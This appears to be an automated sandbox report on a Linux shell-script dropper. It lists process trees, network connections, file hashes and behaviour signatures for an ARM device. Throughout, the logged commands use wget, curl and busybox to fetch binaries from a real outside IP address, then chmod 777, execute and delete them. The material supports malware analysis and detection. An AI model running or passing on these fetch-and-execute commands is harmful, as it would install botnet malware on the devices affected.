/tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT
[./7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/bin/rm
[rm 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/usr/bin/wget
[wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/bin/chmod
[chmod 777 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s
[./3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/bin/rm
[rm 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 151.101.193.91:443 | tcp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| GB | 195.181.164.14:443 | tcp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-24 02:06
Reported
2024-11-24 02:09
Platform
debian9-armhf-20240611-en
Max time kernel
71s
Max time network
76s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ | /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ | N/A |
| N/A | /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT | /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT | N/A |
| N/A | /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s | /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s | N/A |
| N/A | /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 | /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 | N/A |
| N/A | /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk | /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk | N/A |
| N/A | /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m | /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m | N/A |
| N/A | /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q | /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q | N/A |
| N/A | /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM | /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM | N/A |
| N/A | /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 | /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 | N/A |
| N/A | /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv | /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv | N/A |
| N/A | /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj | /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj | N/A |
| N/A | /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI | /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI | N/A |
| N/A | /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh | /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh | N/A |
| N/A | /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy | /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy | N/A |
| N/A | /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 | /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 | N/A |
| N/A | /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk | /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk | N/A |
| N/A | /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m | /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m | N/A |
| N/A | /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q | /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q | N/A |
| N/A | /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM | /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM | N/A |
| N/A | /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv | /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv | N/A |
| N/A | /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy | /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy | N/A |
| N/A | /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj | /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj | N/A |
| N/A | /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI | /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI | N/A |
| N/A | /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh | /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj | /usr/bin/curl | N/A |
Processes
/tmp/294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh
[/tmp/294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/bin/chmod
[chmod 777 fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ
[./fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/bin/rm
[rm fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/bin/chmod
[chmod 777 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT
[./7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/bin/rm
[rm 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/usr/bin/wget
[wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/bin/chmod
[chmod 777 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s
[./3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/bin/rm
[rm 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/usr/bin/wget
[wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/bin/chmod
[chmod 777 RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4
[./RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/bin/rm
[rm RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/usr/bin/wget
[wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/bin/chmod
[chmod 777 DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk
[./DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/bin/rm
[rm DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/usr/bin/wget
[wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/bin/chmod
[chmod 777 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m
[./8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/bin/rm
[rm 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/usr/bin/wget
[wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/bin/chmod
[chmod 777 LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q
[./LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/bin/rm
[rm LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/usr/bin/wget
[wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/bin/chmod
[chmod 777 ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM
[./ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/bin/rm
[rm ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/usr/bin/wget
[wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/bin/chmod
[chmod 777 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5
[./BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/bin/rm
[rm BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/usr/bin/wget
[wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/bin/chmod
[chmod 777 Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv
[./Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/bin/rm
[rm Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/usr/bin/wget
[wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/bin/chmod
[chmod 777 DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj
[./DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/bin/rm
[rm DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/usr/bin/wget
[wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/bin/chmod
[chmod 777 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI
[./3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/bin/rm
[rm 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/usr/bin/wget
[wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/bin/chmod
